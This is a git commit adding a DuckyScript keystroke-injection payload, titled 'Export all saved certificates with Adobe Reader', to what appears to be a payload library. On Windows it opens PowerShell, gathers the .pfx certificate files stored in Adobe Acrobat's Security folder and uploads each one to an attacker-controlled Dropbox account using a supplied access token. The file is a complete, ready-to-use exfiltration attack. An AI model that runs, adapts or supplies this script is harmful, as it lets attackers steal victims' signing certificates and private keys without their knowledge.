Export all saved certificates with Adobe Reader

2023-06-12 14:41:56 +02:00 · 2023-06-12 14:41:56 +02:00 · 0d0c2668c0
parent 716a6bd80b
commit 0d0c2668c0
1 changed files with 55 additions and 0 deletions
--- a/payloads/library/exfiltration/Export_all_saved_certificates_with_Adobe_Reader/payload.txt
+++ b/payloads/library/exfiltration/Export_all_saved_certificates_with_Adobe_Reader/payload.txt
@ -0,0 +1,55 @@
+REM ####################################################################
+REM #                                                                  |
+REM # Title        : Export all saved certificates with Adobe Reader   |
+REM # Author       : Aleff                                             |
+REM # Version      : 1.0                                               |
+REM # Category     : Exfiltration                                      |
+REM # Target       : Windows 10-11                                     |
+REM #                                                                  |
+REM ####################################################################
+
+
+REM Requirements:
+REM     - Adobe Reader must be installed
+REM     - Internet Connection
+
+
+REM You must define your Dropbox accessToken or modify the exfiltration modality.
+DEFINE DROPBOX_ACCESS_TOKEN example
+
+
+GUI r
+DELAY 1000
+STRING PowerShell
+DELAY 2000
+
+REM Settings about Adobe Reader
+STRINGLN
+    $roamingFolderPath = [Environment]::GetFolderPath('ApplicationData')
+    $securityFolderPath = Join-Path -Path $roamingFolderPath -ChildPath 'Adobe\Acrobat\DC\Security'
+    $pfxFiles = Get-ChildItem -Path $securityFolderPath -Filter '*.pfx' -File
+END_STRINGLN
+
+REM Setting about exfiltration
+STRING $accessToken = "
+STRING DROPBOX_ACCESS_TOKEN
+STRING "
+ENTER
+
+STRINGLN
+    $authHeader = @{Authorization = "Bearer $accessToken"}
+
+    $uploadUrl = "https://content.dropboxapi.com/2/files/upload"
+
+    foreach ($file in $pfxFiles) {
+        $dropboxFilePath = "/$file"
+        $headers = @{}
+        $headers.Add("Authorization", "Bearer $accessToken")
+        $headers.Add("Dropbox-API-Arg", '{"path":"' + $dropboxFilePath + '","mode":"add","autorename":true,"mute":false}')
+        $headers.Add("Content-Type", "application/octet-stream")
+
+        Invoke-RestMethod -Uri $uploadUrl -Headers $headers -Method Post -Body $file
+    }
+
+    exit    
+END_STRINGLN